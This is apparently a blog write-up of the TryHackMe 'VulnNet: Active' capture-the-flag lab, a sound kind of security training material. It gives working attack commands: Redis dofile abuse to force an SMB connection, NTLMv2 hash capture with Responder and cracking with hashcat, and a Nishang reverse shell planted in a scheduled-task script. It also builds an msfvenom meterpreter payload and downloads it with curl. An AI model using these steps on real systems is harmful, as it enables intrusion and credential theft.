VulnNet: Active Tryhackme

Surya Dev Singh

5 min readJan 7, 2023

VulnNet Entertainment just moved its entire infrastructure… Check this out…

Information gathering

rustscan

nmap

fir I run the smbmap and smbclient but it shows that there is no anonymous login

then I found the Redis server running on 6379, first I tried to connect to it using NC and run the command

CONFIG GET *

and we got a username

after some time I found that it is possible to read a file with the eval and dofile functions in Redis : https://book.hacktricks.xyz/network-services-pentesting/6379-pentesting-redis

and we got our user flag !!

capturing the NTLM hash

since we have a command execution kind of functionality with dofile function in Redis. we can force the machine to connect back and open a remote resource with dofile(<our_ip>/some_remote_share)

this way will we will force the machine to share the NTLM hash to connect to us.

for this, we need Responder to host a smb server, which will also be going to capture the hash !!

python3 Responder.py -I tun0

after running the Responder, lets try to access a remote resource with help of Redis-CLI

redis-cli -h 10.10.121.213 -p 6379 eval "dofile('//10.17.0.110//share')" 0

once the above command will run, it will give us the NTLMv2 hash in our Responder terminal :

now let's try to crack those hashes with help of hashcat with the following command

hashcat.exe -m 5600 <NTLMv2_hash> rockyou.txt -O -d 2

and we have successfully cracked the hash !!

after cracking the hash, let's enumerate the SMB shares !!

let's see what’s there in that share with help of smbclient

Let's download and see what’s the content of that file !!

after downloading file contains some basic code like so :

rm -Force C:\Users\Public\Documents\* -ErrorAction SilentlyContinue

nothing much of interest!!

then I thought of ASREPROASTING OR KERBEROSTING but since there is no LDAP service running on the server, we can’t remotely do the ASREPOSTING OR KERBEROSTING.

after waiting and figuring out lots of things, I figured out that the file we found in Enterprise-Share.

that file might be used for Schedule Task let's try to overwrite it with Nishang shell. we will be using Invoke-PowerShellTcp.ps1

At the very end of the nishang file add

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.121.213 -Port 1234

and rename the nishang file with PurgeIrrelevantData_1826.ps1

now let's put the file on the SMB share and wait for some time, maybe we can get a shell if the Schedule task is running on that location !!

now just overwrite the file with

put PurgetIrrelevantData_1826.ps1

after successfully putting the file on the share, let's fire up our NC listener

nc -lvp 1234

within 30 seconds we get our first shell !!!

Let's now upgrade with meterpreter

simply create meterpreter rev shell like so :

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.17.0.110 LPORT=9991 -f exe -o revshell.exe

now host the file with python

python3 -m http.server 80

now download the rev shell file with help of curl like this

curl <my_localip>/revshell -o revshell

now setup the msfconsole and execute the revshell file :

after getting meterpreter shell, lets now enumerate machine.

now I would like to run the local exploit to know, which exploit can be used, this can be an easy win or can crash the machine also if the right exploit is not used.